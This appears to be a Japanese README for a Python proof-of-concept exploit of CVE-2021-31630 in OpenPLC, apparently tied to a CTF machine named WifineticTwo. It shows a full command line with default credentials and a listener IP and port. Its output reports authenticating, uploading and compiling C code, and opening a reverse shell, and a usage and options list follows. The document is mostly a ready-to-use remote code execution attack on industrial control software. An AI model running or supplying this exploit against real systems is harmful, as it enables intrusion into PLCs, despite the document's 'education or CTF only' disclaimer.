
Python3で書かれ、ノンブロッキングモードのCリバースシェルを使用するCVE-2021-31630用POCエクスプロイト
このエクスプロイトは、Fellipe Oliveira によって作成された Exploit-DB のエクスプロイトに基づいています。
└─# python3 custom_exploit.py --url http://10.10.11.7:8080 --username openplc --password openplc --listenerip 10.10.16.4 --listenerport 8888
[*] Authenticated.
[*] C file uploaded. Waiting for compilation.
[*] Compiled, probably.
[*] Started PLC, you should get your reverse shell now.
[*] Stopped PLC.
python3 exploit.py --url <> --username <> --password <> --listenerip <> --listenerport <>
オプション:
--url - OpenPLCのURL--username - ユーザー名--password - パスワード--listenerip - リスナーのIPアドレス--listenerport - リスナーのポート注記: このエクスプロイトはPoCとして作成されています。教育目的またはCTFでのみ使用してください - https://flojboj.org/article/WifineticTwo